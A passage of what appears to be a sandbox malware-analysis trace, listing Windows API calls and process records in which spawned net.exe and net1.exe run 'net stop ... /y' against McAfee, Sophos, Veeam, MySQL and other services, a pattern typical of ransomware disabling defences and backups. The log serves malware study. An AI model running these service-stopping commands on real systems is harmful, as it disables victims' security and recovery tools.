GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef648, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0129.146] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x64) returned 0x5c3ad8 [0129.146] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0129.147] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xef84c | out: Buffer=0xef84c*=0x5c1ae0) returned 0x0 [0129.147] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xef84c | out: Buffer=0xef84c*=0x5c1af8) returned 0x0 [0129.147] _fileno (_File=0x77032900) returned -2 [0129.147] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0129.147] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0129.147] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0129.147] _wcsicmp (_String1="config", _String2="stop") returned -16 [0129.147] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0129.147] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0129.147] _wcsicmp (_String1="file", _String2="stop") returned -13 [0129.147] _wcsicmp (_String1="files", _String2="stop") returned -13 [0129.147] _wcsicmp (_String1="group", _String2="stop") returned -12 [0129.147] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0129.147] _wcsicmp (_String1="help", _String2="stop") returned -11 [0129.147] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0129.147] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0129.147] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0129.147] _wcsicmp (_String1="session", _String2="stop") returned -15 [0129.147] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0129.147] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0129.147] _wcsicmp (_String1="share", _String2="stop") returned -12 [0129.147] _wcsicmp (_String1="start", _String2="stop") returned -14 [0129.147] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0129.147] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0129.147] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0129.147] _wcsicmp (_String1="accounts", _String2="McShield") returned -12 [0129.147] _wcsicmp (_String1="computer", _String2="McShield") returned -10 [0129.147] _wcsicmp (_String1="config", _String2="McShield") returned -10 [0129.147] _wcsicmp (_String1="continue", _String2="McShield") returned -10 [0129.148] _wcsicmp (_String1="cont", _String2="McShield") returned -10 [0129.148] _wcsicmp (_String1="file", _String2="McShield") returned -7 [0129.148] _wcsicmp (_String1="files", _String2="McShield") returned -7 [0129.148] _wcsicmp (_String1="group", _String2="McShield") returned -6 [0129.148] _wcsicmp (_String1="groups", _String2="McShield") returned -6 [0129.148] _wcsicmp (_String1="help", _String2="McShield") returned -5 [0129.148] _wcsicmp (_String1="helpmsg", _String2="McShield") returned -5 [0129.148] _wcsicmp (_String1="localgroup", _String2="McShield") returned -1 [0129.148] _wcsicmp (_String1="pause", _String2="McShield") returned 3 [0129.148] _wcsicmp (_String1="session", _String2="McShield") returned 6 [0129.148] _wcsicmp (_String1="sessions", _String2="McShield") returned 6 [0129.148] _wcsicmp (_String1="sess", _String2="McShield") returned 6 [0129.148] _wcsicmp (_String1="share", _String2="McShield") returned 6 [0129.148] _wcsicmp (_String1="start", _String2="McShield") returned 6 [0129.148] _wcsicmp (_String1="stats", _String2="McShield") returned 6 [0129.148] _wcsicmp (_String1="statistics", _String2="McShield") returned 6 [0129.148] _wcsicmp (_String1="stop", _String2="McShield") returned 6 [0129.148] _wcsicmp (_String1="time", _String2="McShield") returned 7 [0129.148] _wcsicmp (_String1="user", _String2="McShield") returned 8 [0129.148] _wcsicmp (_String1="users", _String2="McShield") returned 8 [0129.148] _wcsicmp (_String1="msg", _String2="McShield") returned 16 [0129.148] _wcsicmp (_String1="messenger", _String2="McShield") returned 2 [0129.148] _wcsicmp (_String1="receiver", _String2="McShield") returned 5 [0129.148] _wcsicmp (_String1="rcv", _String2="McShield") returned 5 [0129.148] _wcsicmp (_String1="netpopup", _String2="McShield") returned 1 [0129.148] _wcsicmp (_String1="redirector", _String2="McShield") returned 5 [0129.148] _wcsicmp (_String1="redir", _String2="McShield") returned 5 [0129.148] _wcsicmp (_String1="rdr", _String2="McShield") returned 5 [0129.148] _wcsicmp (_String1="workstation", _String2="McShield") returned 10 [0129.149] _wcsicmp (_String1="work", _String2="McShield") returned 10 [0129.149] _wcsicmp (_String1="wksta", _String2="McShield") returned 10 [0129.149] _wcsicmp (_String1="prdr", _String2="McShield") returned 3 [0129.149] _wcsicmp (_String1="devrdr", _String2="McShield") returned -9 [0129.149] _wcsicmp (_String1="lanmanworkstation", _String2="McShield") returned -1 [0129.149] _wcsicmp (_String1="server", _String2="McShield") returned 6 [0129.149] _wcsicmp (_String1="svr", _String2="McShield") returned 6 [0129.149] _wcsicmp (_String1="srv", _String2="McShield") returned 6 [0129.149] _wcsicmp (_String1="lanmanserver", _String2="McShield") returned -1 [0129.149] _wcsicmp (_String1="alerter", _String2="McShield") returned -12 [0129.149] _wcsicmp (_String1="netlogon", _String2="McShield") returned 1 [0129.149] _wcsupr (in: _String="McShield" | out: _String="MCSHIELD") returned="MCSHIELD" [0129.328] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5c54a8 [0129.332] GetServiceKeyNameW (in: hSCManager=0x5c54a8, lpDisplayName="MCSHIELD", lpServiceName=0xe5aaf0, lpcchBuffer=0xef7e8 | out: lpServiceName="", lpcchBuffer=0xef7e8) returned 0 [0129.332] _wcsicmp (_String1="msg", _String2="MCSHIELD") returned 16 [0129.332] _wcsicmp (_String1="messenger", _String2="MCSHIELD") returned 2 [0129.332] _wcsicmp (_String1="receiver", _String2="MCSHIELD") returned 5 [0129.332] _wcsicmp (_String1="rcv", _String2="MCSHIELD") returned 5 [0129.333] _wcsicmp (_String1="redirector", _String2="MCSHIELD") returned 5 [0129.333] _wcsicmp (_String1="redir", _String2="MCSHIELD") returned 5 [0129.333] _wcsicmp (_String1="rdr", _String2="MCSHIELD") returned 5 [0129.333] _wcsicmp (_String1="workstation", _String2="MCSHIELD") returned 10 [0129.333] _wcsicmp (_String1="work", _String2="MCSHIELD") returned 10 [0129.333] _wcsicmp (_String1="wksta", _String2="MCSHIELD") returned 10 [0129.333] _wcsicmp (_String1="prdr", _String2="MCSHIELD") returned 3 [0129.333] _wcsicmp (_String1="devrdr", _String2="MCSHIELD") returned -9 [0129.333] _wcsicmp (_String1="lanmanworkstation", _String2="MCSHIELD") returned -1 [0129.333] _wcsicmp (_String1="server", _String2="MCSHIELD") returned 6 [0129.333] _wcsicmp (_String1="svr", _String2="MCSHIELD") returned 6 [0129.333] _wcsicmp (_String1="srv", _String2="MCSHIELD") returned 6 [0129.333] _wcsicmp (_String1="lanmanserver", _String2="MCSHIELD") returned -1 [0129.333] _wcsicmp (_String1="alerter", _String2="MCSHIELD") returned -12 [0129.333] _wcsicmp (_String1="netlogon", _String2="MCSHIELD") returned 1 [0129.333] NetServiceControl (in: servername=0x0, service="MCSHIELD", opcode=0x0, arg=0x0, bufptr=0xef7e4 | out: bufptr=0xef7e4) returned 0x889 [0129.334] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0129.334] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0129.335] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0129.337] GetFileType (hFile=0x0) returned 0x0 [0129.337] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5c3ec0 [0129.337] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5c3ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0129.337] WriteFile (in: hFile=0x0, lpBuffer=0x5c3ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xef724, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef724, lpOverlapped=0x0) returned 0 [0129.337] LocalFree (hMem=0x5c3ec0) returned 0x0 [0129.337] GetFileType (hFile=0x0) returned 0x0 [0129.337] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c6170 [0129.337] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0129.337] WriteFile (in: hFile=0x0, lpBuffer=0x5c6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef724, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef724, lpOverlapped=0x0) returned 0 [0129.337] LocalFree (hMem=0x5c6170) returned 0x0 [0129.337] _ultow (in: _Dest=0x889, _Radix=980820 | out: _Dest=0x889) returned="2185" [0129.337] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0129.338] GetFileType (hFile=0x0) returned 0x0 [0129.338] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5c6170 [0129.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5c6170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0129.338] WriteFile (in: hFile=0x0, lpBuffer=0x5c6170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xef730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef730, lpOverlapped=0x0) returned 0 [0129.338] LocalFree (hMem=0x5c6170) returned 0x0 [0129.338] GetFileType (hFile=0x0) returned 0x0 [0129.338] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c6170 [0129.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0129.338] WriteFile (in: hFile=0x0, lpBuffer=0x5c6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef730, lpOverlapped=0x0) returned 0 [0129.338] LocalFree (hMem=0x5c6170) returned 0x0 [0129.338] NetApiBufferFree (Buffer=0x5c1ae0) returned 0x0 [0129.338] NetApiBufferFree (Buffer=0x5c1af8) returned 0x0 [0129.338] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McShield /y" [0129.338] exit (_Code=2) Process: id = "320" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x53115000" os_pid = "0x102c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SntpService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 731 os_tid = 0x138c Process: id = "321" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x51ba0000" os_pid = "0x914" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Sophos Web Control Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 732 os_tid = 0x5b4 Process: id = "322" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x70092000" os_pid = "0x614" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "190" os_parent_pid = "0x12d0" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamRESTSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 733 os_tid = 0xa24 [0130.534] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fa54 | out: lpSystemTimeAsFileTime=0x14fa54*(dwLowDateTime=0x218a9650, dwHighDateTime=0x1d6f0d1)) [0130.534] GetCurrentProcessId () returned 0x614 [0130.534] GetCurrentThreadId () returned 0xa24 [0130.534] GetTickCount () returned 0x1153d8d [0130.534] QueryPerformanceCounter (in: lpPerformanceCount=0x14fa4c | out: lpPerformanceCount=0x14fa4c*=24963526583) returned 1 [0130.535] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0130.535] __set_app_type (_Type=0x1) [0130.535] __p__fmode () returned 0x770331f4 [0130.535] __p__commode () returned 0x770331fc [0130.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0130.535] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0130.535] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.535] GetConsoleOutputCP () returned 0x1b5 [0130.536] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0130.537] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.540] sprintf_s (in: _DstBuf=0x14fa0c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0130.540] setlocale (category=0, locale=".437") returned="English_United States.437" [0130.542] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0130.542] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0130.542] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamRESTSvc /y" [0130.542] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f7d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0130.542] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6c) returned 0x423ae0 [0130.543] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0130.543] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14f9dc | out: Buffer=0x14f9dc*=0x421ae8) returned 0x0 [0130.543] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14f9dc | out: Buffer=0x14f9dc*=0x421b00) returned 0x0 [0130.543] _fileno (_File=0x77032900) returned -2 [0130.543] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0130.543] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0130.543] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0130.543] _wcsicmp (_String1="config", _String2="stop") returned -16 [0130.543] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0130.543] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0130.543] _wcsicmp (_String1="file", _String2="stop") returned -13 [0130.543] _wcsicmp (_String1="files", _String2="stop") returned -13 [0130.543] _wcsicmp (_String1="group", _String2="stop") returned -12 [0130.543] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0130.543] _wcsicmp (_String1="help", _String2="stop") returned -11 [0130.543] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0130.543] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0130.543] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0130.543] _wcsicmp (_String1="session", _String2="stop") returned -15 [0130.543] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0130.543] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0130.543] _wcsicmp (_String1="share", _String2="stop") returned -12 [0130.543] _wcsicmp (_String1="start", _String2="stop") returned -14 [0130.543] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0130.543] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0130.543] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0130.543] _wcsicmp (_String1="accounts", _String2="VeeamRESTSvc") returned -21 [0130.544] _wcsicmp (_String1="computer", _String2="VeeamRESTSvc") returned -19 [0130.544] _wcsicmp (_String1="config", _String2="VeeamRESTSvc") returned -19 [0130.544] _wcsicmp (_String1="continue", _String2="VeeamRESTSvc") returned -19 [0130.544] _wcsicmp (_String1="cont", _String2="VeeamRESTSvc") returned -19 [0130.544] _wcsicmp (_String1="file", _String2="VeeamRESTSvc") returned -16 [0130.544] _wcsicmp (_String1="files", _String2="VeeamRESTSvc") returned -16 [0130.544] _wcsicmp (_String1="group", _String2="VeeamRESTSvc") returned -15 [0130.544] _wcsicmp (_String1="groups", _String2="VeeamRESTSvc") returned -15 [0130.544] _wcsicmp (_String1="help", _String2="VeeamRESTSvc") returned -14 [0130.544] _wcsicmp (_String1="helpmsg", _String2="VeeamRESTSvc") returned -14 [0130.544] _wcsicmp (_String1="localgroup", _String2="VeeamRESTSvc") returned -10 [0130.544] _wcsicmp (_String1="pause", _String2="VeeamRESTSvc") returned -6 [0130.544] _wcsicmp (_String1="session", _String2="VeeamRESTSvc") returned -3 [0130.544] _wcsicmp (_String1="sessions", _String2="VeeamRESTSvc") returned -3 [0130.544] _wcsicmp (_String1="sess", _String2="VeeamRESTSvc") returned -3 [0130.544] _wcsicmp (_String1="share", _String2="VeeamRESTSvc") returned -3 [0130.544] _wcsicmp (_String1="start", _String2="VeeamRESTSvc") returned -3 [0130.544] _wcsicmp (_String1="stats", _String2="VeeamRESTSvc") returned -3 [0130.544] _wcsicmp (_String1="statistics", _String2="VeeamRESTSvc") returned -3 [0130.544] _wcsicmp (_String1="stop", _String2="VeeamRESTSvc") returned -3 [0130.544] _wcsicmp (_String1="time", _String2="VeeamRESTSvc") returned -2 [0130.544] _wcsicmp (_String1="user", _String2="VeeamRESTSvc") returned -1 [0130.544] _wcsicmp (_String1="users", _String2="VeeamRESTSvc") returned -1 [0130.544] _wcsicmp (_String1="msg", _String2="VeeamRESTSvc") returned -9 [0130.544] _wcsicmp (_String1="messenger", _String2="VeeamRESTSvc") returned -9 [0130.544] _wcsicmp (_String1="receiver", _String2="VeeamRESTSvc") returned -4 [0130.544] _wcsicmp (_String1="rcv", _String2="VeeamRESTSvc") returned -4 [0130.544] _wcsicmp (_String1="netpopup", _String2="VeeamRESTSvc") returned -8 [0130.544] _wcsicmp (_String1="redirector", _String2="VeeamRESTSvc") returned -4 [0130.544] _wcsicmp (_String1="redir", _String2="VeeamRESTSvc") returned -4 [0130.544] _wcsicmp (_String1="rdr", _String2="VeeamRESTSvc") returned -4 [0130.544] _wcsicmp (_String1="workstation", _String2="VeeamRESTSvc") returned 1 [0130.544] _wcsicmp (_String1="work", _String2="VeeamRESTSvc") returned 1 [0130.544] _wcsicmp (_String1="wksta", _String2="VeeamRESTSvc") returned 1 [0130.545] _wcsicmp (_String1="prdr", _String2="VeeamRESTSvc") returned -6 [0130.545] _wcsicmp (_String1="devrdr", _String2="VeeamRESTSvc") returned -18 [0130.545] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamRESTSvc") returned -10 [0130.545] _wcsicmp (_String1="server", _String2="VeeamRESTSvc") returned -3 [0130.545] _wcsicmp (_String1="svr", _String2="VeeamRESTSvc") returned -3 [0130.545] _wcsicmp (_String1="srv", _String2="VeeamRESTSvc") returned -3 [0130.545] _wcsicmp (_String1="lanmanserver", _String2="VeeamRESTSvc") returned -10 [0130.545] _wcsicmp (_String1="alerter", _String2="VeeamRESTSvc") returned -21 [0130.545] _wcsicmp (_String1="netlogon", _String2="VeeamRESTSvc") returned -8 [0130.545] _wcsupr (in: _String="VeeamRESTSvc" | out: _String="VEEAMRESTSVC") returned="VEEAMRESTSVC" [0130.545] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4254b0 [0130.961] GetServiceKeyNameW (in: hSCManager=0x4254b0, lpDisplayName="VEEAMRESTSVC", lpServiceName=0xe5aaf0, lpcchBuffer=0x14f978 | out: lpServiceName="", lpcchBuffer=0x14f978) returned 0 [0130.962] _wcsicmp (_String1="msg", _String2="VEEAMRESTSVC") returned -9 [0130.962] _wcsicmp (_String1="messenger", _String2="VEEAMRESTSVC") returned -9 [0130.962] _wcsicmp (_String1="receiver", _String2="VEEAMRESTSVC") returned -4 [0130.962] _wcsicmp (_String1="rcv", _String2="VEEAMRESTSVC") returned -4 [0130.962] _wcsicmp (_String1="redirector", _String2="VEEAMRESTSVC") returned -4 [0130.963] _wcsicmp (_String1="redir", _String2="VEEAMRESTSVC") returned -4 [0130.963] _wcsicmp (_String1="rdr", _String2="VEEAMRESTSVC") returned -4 [0130.963] _wcsicmp (_String1="workstation", _String2="VEEAMRESTSVC") returned 1 [0130.963] _wcsicmp (_String1="work", _String2="VEEAMRESTSVC") returned 1 [0130.963] _wcsicmp (_String1="wksta", _String2="VEEAMRESTSVC") returned 1 [0130.963] _wcsicmp (_String1="prdr", _String2="VEEAMRESTSVC") returned -6 [0130.963] _wcsicmp (_String1="devrdr", _String2="VEEAMRESTSVC") returned -18 [0130.963] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMRESTSVC") returned -10 [0130.963] _wcsicmp (_String1="server", _String2="VEEAMRESTSVC") returned -3 [0130.963] _wcsicmp (_String1="svr", _String2="VEEAMRESTSVC") returned -3 [0130.963] _wcsicmp (_String1="srv", _String2="VEEAMRESTSVC") returned -3 [0130.963] _wcsicmp (_String1="lanmanserver", _String2="VEEAMRESTSVC") returned -10 [0130.963] _wcsicmp (_String1="alerter", _String2="VEEAMRESTSVC") returned -21 [0130.963] _wcsicmp (_String1="netlogon", _String2="VEEAMRESTSVC") returned -8 [0130.963] NetServiceControl (in: servername=0x0, service="VEEAMRESTSVC", opcode=0x0, arg=0x0, bufptr=0x14f974 | out: bufptr=0x14f974) returned 0x889 [0130.965] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0130.965] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0130.966] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0130.968] GetFileType (hFile=0x0) returned 0x0 [0130.968] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x423ed0 [0130.968] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x423ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0130.968] WriteFile (in: hFile=0x0, lpBuffer=0x423ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x14f8b4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f8b4, lpOverlapped=0x0) returned 0 [0130.969] LocalFree (hMem=0x423ed0) returned 0x0 [0130.969] GetFileType (hFile=0x0) returned 0x0 [0130.969] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426178 [0130.969] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0130.969] WriteFile (in: hFile=0x0, lpBuffer=0x426178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f8b4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f8b4, lpOverlapped=0x0) returned 0 [0130.969] LocalFree (hMem=0x426178) returned 0x0 [0130.969] _ultow (in: _Dest=0x889, _Radix=1374436 | out: _Dest=0x889) returned="2185" [0130.969] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0130.969] GetFileType (hFile=0x0) returned 0x0 [0130.969] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x426178 [0130.969] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x426178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0130.969] WriteFile (in: hFile=0x0, lpBuffer=0x426178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x14f8c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f8c0, lpOverlapped=0x0) returned 0 [0130.969] LocalFree (hMem=0x426178) returned 0x0 [0130.969] GetFileType (hFile=0x0) returned 0x0 [0130.969] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426178 [0130.970] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0130.970] WriteFile (in: hFile=0x0, lpBuffer=0x426178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f8c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f8c0, lpOverlapped=0x0) returned 0 [0130.970] LocalFree (hMem=0x426178) returned 0x0 [0130.970] NetApiBufferFree (Buffer=0x421ae8) returned 0x0 [0130.970] NetApiBufferFree (Buffer=0x421b00) returned 0x0 [0130.970] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamRESTSvc /y" [0130.970] exit (_Code=2) Process: id = "323" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x53fb7000" os_pid = "0x132c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "191" os_parent_pid = "0x12dc" cmd_line = "C:\\Windows\\system32\\net1 stop MySQL80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 734 os_tid = 